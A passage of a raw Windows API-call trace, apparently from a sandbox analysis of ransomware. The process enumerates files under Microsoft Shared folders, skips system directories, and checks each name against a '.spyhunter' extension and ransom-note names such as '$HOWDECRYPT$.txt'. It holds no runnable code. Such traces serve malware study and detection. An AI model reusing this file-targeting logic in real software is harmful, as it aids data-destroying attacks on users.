lstrcmpW (lpString1="OSE.EXE", lpString2="_uninstalling_.png") returned 1 [0089.470] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE") returned 72 [0089.470] GetProcessHeap () returned 0x2c0000 [0089.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3858a0 [0089.470] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd90) returned 0x3824f8 [0089.470] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0089.470] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0089.470] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\$HOWDECRYPT$.txt") returned 81 [0089.470] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\$HOWDECRYPT$.txt") returned 81 [0089.470] GetProcessHeap () returned 0x2c0000 [0089.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x3299f8 [0089.470] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd98) returned 0x3824f8 [0089.470] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0089.470] lstrcmpiW (lpString1="Stationery", lpString2="Windows") returned -1 [0089.470] lstrlenW (lpString="Windows") returned 7 [0089.470] lstrcmpiW (lpString1="Stationery", lpString2="$Recycle.bin") returned 1 [0089.470] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.470] lstrcmpiW (lpString1="Stationery", lpString2="System Volume Information") returned -1 [0089.470] lstrlenW (lpString="System Volume Information") returned 25 [0089.470] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery") returned 61 [0089.470] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0089.470] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0089.470] GetProcessHeap () returned 0x2c0000 [0089.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0089.471] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*") returned 63 [0089.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0089.711] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.711] lstrlenW (lpString="Windows") returned 7 [0089.711] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.711] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.711] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.711] lstrlenW (lpString="System Volume Information") returned 25 [0089.711] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\.") returned 63 [0089.711] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.712] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.755] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.755] lstrlenW (lpString="Windows") returned 7 [0089.755] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.755] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.755] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.755] lstrlenW (lpString="System Volume Information") returned 25 [0089.755] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\..") returned 64 [0089.755] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.755] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.755] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.755] lstrcmpiW (lpString1="Bears.htm", lpString2="Windows") returned -1 [0089.755] lstrlenW (lpString="Windows") returned 7 [0089.755] lstrcmpiW (lpString1="Bears.htm", lpString2="$Recycle.bin") returned 1 [0089.756] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.756] lstrcmpiW (lpString1="Bears.htm", lpString2="System Volume Information") returned -1 [0089.756] lstrlenW (lpString="System Volume Information") returned 25 [0089.756] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 71 [0089.756] StrStrIW (lpFirst="Bears.htm", lpSrch=".spyhunter") returned 0x0 [0089.756] lstrcmpW (lpString1="Bears.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.756] lstrcmpW (lpString1="Bears.htm", lpString2="_uninstalling_.png") returned 1 [0089.756] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 71 [0089.756] GetProcessHeap () returned 0x2c0000 [0089.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37d708 [0089.756] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd50) returned 0x3824f8 [0089.756] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.756] lstrcmpiW (lpString1="Bears.jpg", lpString2="Windows") returned -1 [0089.756] lstrlenW (lpString="Windows") returned 7 [0089.756] lstrcmpiW (lpString1="Bears.jpg", lpString2="$Recycle.bin") returned 1 [0089.756] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.756] lstrcmpiW (lpString1="Bears.jpg", lpString2="System Volume Information") returned -1 [0089.756] lstrlenW (lpString="System Volume Information") returned 25 [0089.756] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 71 [0089.756] StrStrIW (lpFirst="Bears.jpg", lpSrch=".spyhunter") returned 0x0 [0089.756] lstrcmpW (lpString1="Bears.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.756] lstrcmpW (lpString1="Bears.jpg", lpString2="_uninstalling_.png") returned 1 [0089.756] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 71 [0089.756] GetProcessHeap () returned 0x2c0000 [0089.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37d558 [0089.757] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd58) returned 0x3824f8 [0089.757] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.757] lstrcmpiW (lpString1="Blue_Gradient.jpg", lpString2="Windows") returned -1 [0089.757] lstrlenW (lpString="Windows") returned 7 [0089.757] lstrcmpiW (lpString1="Blue_Gradient.jpg", lpString2="$Recycle.bin") returned 1 [0089.757] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.757] lstrcmpiW (lpString1="Blue_Gradient.jpg", lpString2="System Volume Information") returned -1 [0089.757] lstrlenW (lpString="System Volume Information") returned 25 [0089.757] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 79 [0089.757] StrStrIW (lpFirst="Blue_Gradient.jpg", lpSrch=".spyhunter") returned 0x0 [0089.757] lstrcmpW (lpString1="Blue_Gradient.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.757] lstrcmpW (lpString1="Blue_Gradient.jpg", lpString2="_uninstalling_.png") returned 1 [0089.757] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 79 [0089.757] GetProcessHeap () returned 0x2c0000 [0089.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x373180 [0089.757] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd60) returned 0x3824f8 [0089.757] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.757] lstrcmpiW (lpString1="Cave_Drawings.gif", lpString2="Windows") returned -1 [0089.757] lstrlenW (lpString="Windows") returned 7 [0089.757] lstrcmpiW (lpString1="Cave_Drawings.gif", lpString2="$Recycle.bin") returned 1 [0089.757] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.757] lstrcmpiW (lpString1="Cave_Drawings.gif", lpString2="System Volume Information") returned -1 [0089.757] lstrlenW (lpString="System Volume Information") returned 25 [0089.757] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 79 [0089.757] StrStrIW (lpFirst="Cave_Drawings.gif", lpSrch=".spyhunter") returned 0x0 [0089.758] lstrcmpW (lpString1="Cave_Drawings.gif", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.758] lstrcmpW (lpString1="Cave_Drawings.gif", lpString2="_uninstalling_.png") returned 1 [0089.758] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 79 [0089.758] GetProcessHeap () returned 0x2c0000 [0089.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x373350 [0089.758] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd68) returned 0x3824f8 [0089.758] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.758] lstrcmpiW (lpString1="Connectivity.gif", lpString2="Windows") returned -1 [0089.758] lstrlenW (lpString="Windows") returned 7 [0089.758] lstrcmpiW (lpString1="Connectivity.gif", lpString2="$Recycle.bin") returned 1 [0089.758] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.758] lstrcmpiW (lpString1="Connectivity.gif", lpString2="System Volume Information") returned -1 [0089.758] lstrlenW (lpString="System Volume Information") returned 25 [0089.758] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 78 [0089.758] StrStrIW (lpFirst="Connectivity.gif", lpSrch=".spyhunter") returned 0x0 [0089.758] lstrcmpW (lpString1="Connectivity.gif", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.759] lstrcmpW (lpString1="Connectivity.gif", lpString2="_uninstalling_.png") returned 1 [0089.759] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 78 [0089.759] GetProcessHeap () returned 0x2c0000 [0089.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x372fb0 [0089.759] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd70) returned 0x3824f8 [0089.759] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.759] lstrcmpiW (lpString1="Desktop.ini", lpString2="Windows") returned -1 [0089.759] lstrlenW (lpString="Windows") returned 7 [0089.759] lstrcmpiW (lpString1="Desktop.ini", lpString2="$Recycle.bin") returned 1 [0089.759] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.759] lstrcmpiW (lpString1="Desktop.ini", lpString2="System Volume Information") returned -1 [0089.759] lstrlenW (lpString="System Volume Information") returned 25 [0089.759] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 73 [0089.759] StrStrIW (lpFirst="Desktop.ini", lpSrch=".spyhunter") returned 0x0 [0089.759] lstrcmpW (lpString1="Desktop.ini", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.759] lstrcmpW (lpString1="Desktop.ini", lpString2="_uninstalling_.png") returned 1 [0089.759] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 73 [0089.759] GetProcessHeap () returned 0x2c0000 [0089.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x385600 [0089.759] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd78) returned 0x3824f8 [0089.759] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.759] lstrcmpiW (lpString1="Dotted_Lines.emf", lpString2="Windows") returned -1 [0089.759] lstrlenW (lpString="Windows") returned 7 [0089.759] lstrcmpiW (lpString1="Dotted_Lines.emf", lpString2="$Recycle.bin") returned 1 [0089.759] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.760] lstrcmpiW (lpString1="Dotted_Lines.emf", lpString2="System Volume Information") returned -1 [0089.760] lstrlenW (lpString="System Volume Information") returned 25 [0089.760] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 78 [0089.760] StrStrIW (lpFirst="Dotted_Lines.emf", lpSrch=".spyhunter") returned 0x0 [0089.760] lstrcmpW (lpString1="Dotted_Lines.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.760] lstrcmpW (lpString1="Dotted_Lines.emf", lpString2="_uninstalling_.png") returned 1 [0089.760] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 78 [0089.760] GetProcessHeap () returned 0x2c0000 [0089.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x373098 [0089.760] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd80) returned 0x3824f8 [0089.760] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.760] lstrcmpiW (lpString1="Garden.htm", lpString2="Windows") returned -1 [0089.760] lstrlenW (lpString="Windows") returned 7 [0089.760] lstrcmpiW (lpString1="Garden.htm", lpString2="$Recycle.bin") returned 1 [0089.760] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.760] lstrcmpiW (lpString1="Garden.htm", lpString2="System Volume Information") returned -1 [0089.760] lstrlenW (lpString="System Volume Information") returned 25 [0089.760] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 72 [0089.760] StrStrIW (lpFirst="Garden.htm", lpSrch=".spyhunter") returned 0x0 [0089.761] lstrcmpW (lpString1="Garden.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.761] lstrcmpW (lpString1="Garden.htm", lpString2="_uninstalling_.png") returned 1 [0089.761] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 72 [0089.761] GetProcessHeap () returned 0x2c0000 [0089.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3858a0 [0089.761] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd88) returned 0x3824f8 [0089.761] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.761] lstrcmpiW (lpString1="Garden.jpg", lpString2="Windows") returned -1 [0089.761] lstrlenW (lpString="Windows") returned 7 [0089.761] lstrcmpiW (lpString1="Garden.jpg", lpString2="$Recycle.bin") returned 1 [0089.761] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.761] lstrcmpiW (lpString1="Garden.jpg", lpString2="System Volume Information") returned -1 [0089.761] lstrlenW (lpString="System Volume Information") returned 25 [0089.761] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 72 [0089.761] StrStrIW (lpFirst="Garden.jpg", lpSrch=".spyhunter") returned 0x0 [0089.761] lstrcmpW (lpString1="Garden.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.762] lstrcmpW (lpString1="Garden.jpg", lpString2="_uninstalling_.png") returned 1 [0089.762] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 72 [0089.762] GetProcessHeap () returned 0x2c0000 [0089.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x385980 [0089.762] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd90) returned 0x3824f8 [0089.762] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.762] lstrcmpiW (lpString1="Genko_1.emf", lpString2="Windows") returned -1 [0089.762] lstrlenW (lpString="Windows") returned 7 [0089.762] lstrcmpiW (lpString1="Genko_1.emf", lpString2="$Recycle.bin") returned 1 [0089.762] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.762] lstrcmpiW (lpString1="Genko_1.emf", lpString2="System Volume Information") returned -1 [0089.762] lstrlenW (lpString="System Volume Information") returned 25 [0089.762] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 73 [0089.762] StrStrIW (lpFirst="Genko_1.emf", lpSrch=".spyhunter") returned 0x0 [0089.762] lstrcmpW (lpString1="Genko_1.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.762] lstrcmpW (lpString1="Genko_1.emf", lpString2="_uninstalling_.png") returned 1 [0089.762] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 73 [0089.762] GetProcessHeap () returned 0x2c0000 [0089.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x385a60 [0089.762] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xd98) returned 0x3824f8 [0089.762] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.763] lstrcmpiW (lpString1="Genko_2.emf", lpString2="Windows") returned -1 [0089.763] lstrlenW (lpString="Windows") returned 7 [0089.763] lstrcmpiW (lpString1="Genko_2.emf", lpString2="$Recycle.bin") returned 1 [0089.763] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.763] lstrcmpiW (lpString1="Genko_2.emf", lpString2="System Volume Information") returned -1 [0089.763] lstrlenW (lpString="System Volume Information") returned 25 [0089.763] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 73 [0089.763] StrStrIW (lpFirst="Genko_2.emf", lpSrch=".spyhunter") returned 0x0 [0089.763] lstrcmpW (lpString1="Genko_2.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.763] lstrcmpW (lpString1="Genko_2.emf", lpString2="_uninstalling_.png") returned 1 [0089.763] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 73 [0089.766] GetProcessHeap () returned 0x2c0000 [0089.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x385b40 [0089.766] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xda0) returned 0x3824f8 [0089.766] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.766] lstrcmpiW (lpString1="Graph.emf", lpString2="Windows") returned -1 [0089.766] lstrlenW (lpString="Windows") returned 7 [0089.766] lstrcmpiW (lpString1="Graph.emf", lpString2="$Recycle.bin") returned 1 [0089.766] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.766] lstrcmpiW (lpString1="Graph.emf", lpString2="System Volume Information") returned -1 [0089.766] lstrlenW (lpString="System Volume Information") returned 25 [0089.766] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 71 [0089.766] StrStrIW (lpFirst="Graph.emf", lpSrch=".spyhunter") returned 0x0 [0089.766] lstrcmpW (lpString1="Graph.emf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.766] lstrcmpW (lpString1="Graph.emf", lpString2="_uninstalling_.png") returned 1 [0089.766] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 71 [0089.767] GetProcessHeap () returned 0x2c0000 [0089.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37d8b8 [0089.767] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xda8) returned 0x3824f8 [0089.767] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.767] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Windows") returned -1 [0089.767] lstrlenW (lpString="Windows") returned 7 [0089.767] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="$Recycle.bin") returned 1 [0089.767] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.767] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="System Volume Information") returned -1 [0089.767] lstrlenW (lpString="System Volume Information") returned 25 [0089.767] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 79 [0089.767] StrStrIW (lpFirst="Green Bubbles.htm", lpSrch=".spyhunter") returned 0x0 [0089.767] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.767] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="_uninstalling_.png") returned 1 [0089.767] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 79 [0089.767] GetProcessHeap () returned 0x2c0000 [0089.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x373438 [0089.767] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xdb0) returned 0x3824f8 [0089.767] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.767] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Windows") returned -1 [0089.767] lstrlenW (lpString="Windows") returned 7 [0089.767] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="$Recycle.bin") returned 1 [0089.767] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.767] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="System Volume Information") returned -1 [0089.767] lstrlenW (lpString="System Volume Information") returned 25 [0089.767] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 78 [0089.768] StrStrIW (lpFirst="GreenBubbles.jpg", lpSrch=".spyhunter") returned 0x0 [0089.768] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.768] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="_uninstalling_.png") returned 1 [0089.768] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 78 [0089.768] GetProcessHeap () returned 0x2c0000 [0089.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x373520 [0089.768] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xdb8) returned 0x3824f8 [0089.768] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.768] lstrcmpiW (lpString1="grid_(cm).wmf", lpString2="Windows") returned -1 [0089.768] lstrlenW (lpString="Windows") returned 7 [0089.768] lstrcmpiW (lpString1="grid_(cm).wmf", lpString2="$Recycle.bin") returned 1 [0089.768] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.768] lstrcmpiW (lpString1="grid_(cm).wmf", lpString2="System Volume Information") returned -1 [0089.768] lstrlenW (lpString="System Volume Information") returned 25 [0089.768] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 75 [0089.768] StrStrIW (lpFirst="grid_(cm).wmf", lpSrch=".spyhunter") returned 0x0 [0089.768] lstrcmpW (lpString1="grid_(cm).wmf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.768] lstrcmpW (lpString1="grid_(cm).wmf", lpString2="_uninstalling_.png") returned 1 [0089.768] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 75 [0089.768] GetProcessHeap () returned 0x2c0000 [0089.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x385c20 [0089.768] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xdc0) returned 0x3824f8 [0089.768] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.768] lstrcmpiW (lpString1="grid_(inch).wmf", lpString2="Windows") returned -1 [0089.768] lstrlenW (lpString="Windows") returned 7 [0089.768] lstrcmpiW (lpString1="grid_(inch).wmf", lpString2="$Recycle.bin") returned 1 [0089.769] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.769] lstrcmpiW (lpString1="grid_(inch).wmf", lpString2="System Volume Information") returned -1 [0089.769] lstrlenW (lpString="System Volume Information") returned 25 [0089.769] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 77 [0089.769] StrStrIW (lpFirst="grid_(inch).wmf", lpSrch=".spyhunter") returned 0x0 [0089.769] lstrcmpW (lpString1="grid_(inch).wmf", lpString2="$HOWDECRYPT$.txt") returned 1 [0089.769] lstrcmpW (lpString1="grid_(inch).wmf", lpString2="_uninstalling_.png") returned 1 [0089.769] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 77 [0089.769] GetProcessHeap () returned 0x2c0000 [0089.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x373608 [0089.769] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0xdc8) returned 0x3824f8 [0089.769] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0089.769] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Windows") returned -1 [0089.769] lstrlenW (lpString="Windows") returned 7 [0089.769] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="$Recycle.bin") returned 1 [0089.769] lstrlenW (lpString="$Recycle.bin") returned 12 [0089.769] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="System Volume Information") returned -1 [0089.769] lstrlenW (lpString="System Volume Information") returned 25 [0089.769] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 77 [0089.769] StrStrIW (lpFirst="Hand Prints.htm", lpSrch=".spyhunter") returned 0x0 [0089.769] 